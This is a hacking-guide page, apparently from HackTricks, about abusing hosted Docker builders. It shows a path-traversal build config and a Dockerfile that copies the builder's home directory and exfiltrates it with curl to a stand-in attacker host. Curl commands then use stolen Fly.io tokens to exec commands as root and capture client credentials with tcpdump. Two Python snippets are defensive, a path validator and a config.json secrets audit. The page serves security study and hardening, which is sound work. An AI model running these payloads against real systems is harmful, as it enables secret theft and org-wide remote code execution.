Abusing Docker Build Context in Hosted Builders (Path Traversal, Exfil, and Cloud Pivot)


tip

Learn and practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn and practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn and practice Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

TL;DR

If a CI/CD platform or hosted builder lets contributors specify the Docker build context path and the Dockerfile path, you can often set the context to a parent directory (e.g., "..") and make host files part of the build context. An attacker-controlled Dockerfile can then COPY and exfiltrate secrets found in the builder user's home (for example, ~/.docker/config.json). Stolen registry tokens may also work against the provider's control-plane APIs, enabling org-wide RCE.

Attack surface

Many hosted builder/registry services do roughly this when building user-submitted images:

  • Read a repo-level config that includes:
      • build context path (sent to the Docker daemon)
      • Dockerfile path relative to that context
  • Copy the indicated build context directory and the Dockerfile to the Docker daemon
  • Build the image and run it as a hosted service

If the platform does not canonicalize and restrict the build context, a user can set it to a location outside the repository (path traversal), causing arbitrary host files readable by the build user to become part of the build context and available to COPY in the Dockerfile.

Practical constraints commonly observed:

  • The Dockerfile must reside within the chosen context path and its path must be known ahead of time.
  • The build user must have read access to files included in the context; special device files can break the copy.
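The canonicalize-and-restrict check whose absence is described above, as an added example (not code from the original page or from any particular platform). The function name `resolve_build_paths`, the `BuildPathError` type and the directory layout in the demo are assumptions made for illustration; the two untrusted inputs correspond to the build context path and Dockerfile path read from the repo-level config.

```python
import os
import tempfile


class BuildPathError(ValueError):
    """Raised when a user-supplied build path leaves its allowed root."""


def _inside(child, parent):
    # Both arguments must already be canonical (realpath) absolute paths.
    return os.path.commonpath([child, parent]) == parent


def resolve_build_paths(repo_root, docker_build_path, dockerfile):
    """Return (context_dir, dockerfile_path) as canonical paths or raise.

    repo_root is the platform's checkout of the repository; the other two
    arguments are the untrusted values read from the repo-level config.
    """
    root = os.path.realpath(repo_root)
    for key, value in (("dockerBuildPath", docker_build_path),
                       ("dockerfile", dockerfile)):
        if not value or os.path.isabs(value) or "\x00" in value:
            raise BuildPathError(f"{key} must be a non-empty relative path")
    # realpath collapses ".." and follows symlinks, so the check below is
    # made on the directory the daemon would really receive.
    context = os.path.realpath(os.path.join(root, docker_build_path))
    if not _inside(context, root) or not os.path.isdir(context):
        raise BuildPathError("build context must be a directory inside the repo")
    df = os.path.realpath(os.path.join(context, dockerfile))
    if not _inside(df, context) or not os.path.isfile(df):
        raise BuildPathError("Dockerfile must be a file inside the build context")
    return context, df


if __name__ == "__main__":
    # Constructed layout: <tmp>/builder is the build user's home,
    # <tmp>/builder/test is the repository checkout.
    with tempfile.TemporaryDirectory() as tmp:
        repo = os.path.join(tmp, "builder", "test")
        os.makedirs(repo)
        open(os.path.join(repo, "Dockerfile"), "w").close()
        for ctx, df in ((".", "Dockerfile"), ("..", "test/Dockerfile")):
            try:
                print(ctx, "->", resolve_build_paths(repo, ctx, df))
            except BuildPathError as exc:
                print(ctx, "-> rejected:", exc)
```

Only the returned canonical paths should be handed to the Docker daemon; passing the original strings after validating them reopens the gap if a symlink changes between check and use.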

PoC: Path traversal via Docker build context

Example malicious server config declaring a Dockerfile within the parent directory context:

```yaml
runtime: "container"
build:
  dockerfile: "test/Dockerfile"   # Must reside inside the final context
  dockerBuildPath: ".."           # Path traversal to builder user $HOME
startCommand:
  type: "http"
  configSchema:
    type: "object"
    properties:
      apiKey:
        type: "string"
    required: ["apiKey"]
  exampleConfig:
    apiKey: "sk-example123"
```

Notes:

  • Using ".." often resolves to the builder user's home (for example, /home/builder), which typically contains sensitive files.
  • Place your Dockerfile inside a directory named after the repo (for example, repo "test" → test/Dockerfile) so that it stays within the expanded parent-directory context.

PoC: Dockerfile to ingest and exfiltrate the host context

```dockerfile
FROM alpine
RUN apk add --no-cache curl
RUN mkdir /data
# Copies entire build context (now builder’s $HOME)
COPY . /data
RUN curl -si https://attacker.tld/?d=$(find /data | base64 -w 0)
```

Targets commonly recovered from $HOME:

  • ~/.docker/config.json (registry auths/tokens)
  • Other cloud/CLI caches and configs (e.g., ~/.fly, ~/.kube, ~/.aws, ~/.config/*)
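An audit a platform operator can run against the build user's ~/.docker/config.json to see which registries keep a usable secret in the file itself rather than in a credential helper. This is an added example, not code from the original page; the function names and the sample config (hosts under example.test, a made-up token) are constructed for illustration, while `auths`, `auth`, `identitytoken` and `credsStore` are the keys Docker uses in that file.

```python
import base64
import binascii
import json

# Fields of an "auths" entry that hold a usable secret in the file itself.
SECRET_FIELDS = ("auth", "identitytoken")


def inline_registry_credentials(config_text):
    """List registries whose credentials are stored inline in config.json.

    Returns dicts with the registry, the secret-bearing fields present and
    the account name decoded from "auth"; secret values are never returned.
    """
    cfg = json.loads(config_text)
    findings = []
    for registry, entry in cfg.get("auths", {}).items():
        fields = [f for f in SECRET_FIELDS if entry.get(f)]
        if not fields:
            continue  # empty entry: the secret lives in a credential helper
        user = None
        if "auth" in fields:
            try:  # "auth" is base64("user:password")
                decoded = base64.b64decode(entry["auth"], validate=True)
                user = decoded.decode("utf-8").partition(":")[0]
            except (binascii.Error, UnicodeDecodeError):
                user = None  # malformed value, still reported as a finding
        findings.append({"registry": registry, "fields": fields, "user": user})
    return findings


def sample_config():
    # Constructed config: one inline credential, one helper-backed registry.
    auth = base64.b64encode(b"builder:constructed-not-a-real-token").decode()
    return json.dumps({
        "auths": {
            "registry.example.test": {"auth": auth},
            "helper.example.test": {},
        },
        "credsStore": "secretservice",
    })


if __name__ == "__main__":
    for finding in inline_registry_credentials(sample_config()):
        print(finding)
```

A registry can still carry an inline `auth` value when a global `credsStore` is configured, which is why the check looks at each entry instead of the top-level setting.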

Tip: Even if the repository contains a .dockerignore, the vulnerable platform-side context selection still governs what is sent to the daemon. If the platform copies the chosen path to the daemon before evaluating your repo's .dockerignore, host files may still be exposed.

Cloud pivot with overprivileged tokens (example: Fly.io Machines API)

Some platforms issue a single bearer token that is usable for both the container registry and the control-plane API. If you exfiltrate a registry token, try it against the provider API.

Example API calls against the Fly.io Machines API using the token stolen from ~/.docker/config.json:

Enumerate apps in an org:

```bash
curl -H "Authorization: Bearer fm2_..." \
  "https://api.machines.dev/v1/apps?org_slug=smithery"
```

Run a command as root inside any machine of an app:

```bash
curl -s -X POST -H "Authorization: Bearer fm2_..." \
  "https://api.machines.dev/v1/apps/<app>/machines/<machine>/exec" \
  --data '{"cmd":"","command":["id"],"container":"","stdin":"","timeout":5}'
```

Impact: org-wide remote code execution across all hosted apps where the token holds sufficient privileges.

Secret theft from compromised hosted services

With exec/RCE on hosted servers, you can harvest client-supplied secrets (API keys, tokens) or mount prompt-injection attacks. Example: install tcpdump and capture HTTP traffic on port 8080 to extract inbound credentials.

```bash
# Install tcpdump inside the machine
curl -s -X POST -H "Authorization: Bearer fm2_..." \
  "https://api.machines.dev/v1/apps/<app>/machines/<machine>/exec" \
  --data '{"cmd":"apk add tcpdump","command":[],"container":"","stdin":"","timeout":5}'

# Capture traffic
curl -s -X POST -H "Authorization: Bearer fm2_..." \
  "https://api.machines.dev/v1/apps/<app>/machines/<machine>/exec" \
  --data '{"cmd":"tcpdump -i eth0 -w /tmp/log tcp port 8080","command":[],"container":"","stdin":"","timeout":5}'
```

Captured requests often contain client credentials in headers, bodies, or query params.
